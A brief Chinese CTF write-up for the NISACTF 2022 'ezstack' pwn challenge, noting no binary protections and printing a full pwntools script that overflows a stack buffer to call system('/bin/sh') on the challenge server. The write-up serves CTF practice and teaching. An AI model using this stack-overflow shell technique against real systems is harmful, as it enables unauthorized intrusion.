[NISACTF 2022]ezstack-入土为安的第十四天

简介: [NISACTF 2022]ezstack-入土为安的第十四天

签到题吧

checksec pwn  没有保护

进入main函数,点进shell ,buf 88808048buf

system 08048512

'/bin/sh 0804A024

直接让代码溢出调用system和/bin/sh

from pwn import *
# 连接到远程服务
p = remote('node5.anna.nssctf.cn', 20789)
# 构造 payload
payload = b'a' * (0x48 + 0x4) + p32(0x08048512) + p32(0x804A024)
# 发送 payload
p.sendlineafter('NISACTF', payload)
# 进入交互模式
p.interactive()

目录
相关文章
|
5月前
|
存储 算法 Linux
CTF—GIF文件格式、隐写方法及案例
CTF—GIF文件格式、隐写方法及案例
170 0
|
6月前
|
人工智能
notsequence 入土为安的第七天
notsequence 入土为安的第七天
41 1
|
6月前
[MoeCTF 2022]chicken_soup 入土为安的第三天
[MoeCTF 2022]chicken_soup 入土为安的第三天
88 0
|
6月前
[CTFHub]ret2text-入土为安的第十二天
[CTFHub]ret2text-入土为安的第十二天
44 0
|
6月前
|
数据安全/隐私保护
[LitCTF 2024]ezrc4——入土为安的第一天
[LitCTF 2024]ezrc4——入土为安的第一天
59 0
|
6月前
|
安全
babystack2.0-入土为安的第十六天
babystack2.0-入土为安的第十六天
48 0
|
6月前
|
算法
【初阶数据结构】复杂度算法题篇
该方法基于如下的事实:当我们将数组的元素向右移动 k 次后,尾部 kmodn 个元素会移动至数组头部,其余元素向后移动 kmodn 个位置。
37 1
|
9月前
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
3508 0
|
6月前
|
Shell
[NISACTF 2022]ezpie- 入土为安的第十五天
[NISACTF 2022]ezpie- 入土为安的第十五天
73 0
|
6月前
|
安全
[MoeCTF 2022]babyfmt-入土为安的第十九天
[MoeCTF 2022]babyfmt-入土为安的第十九天
64 0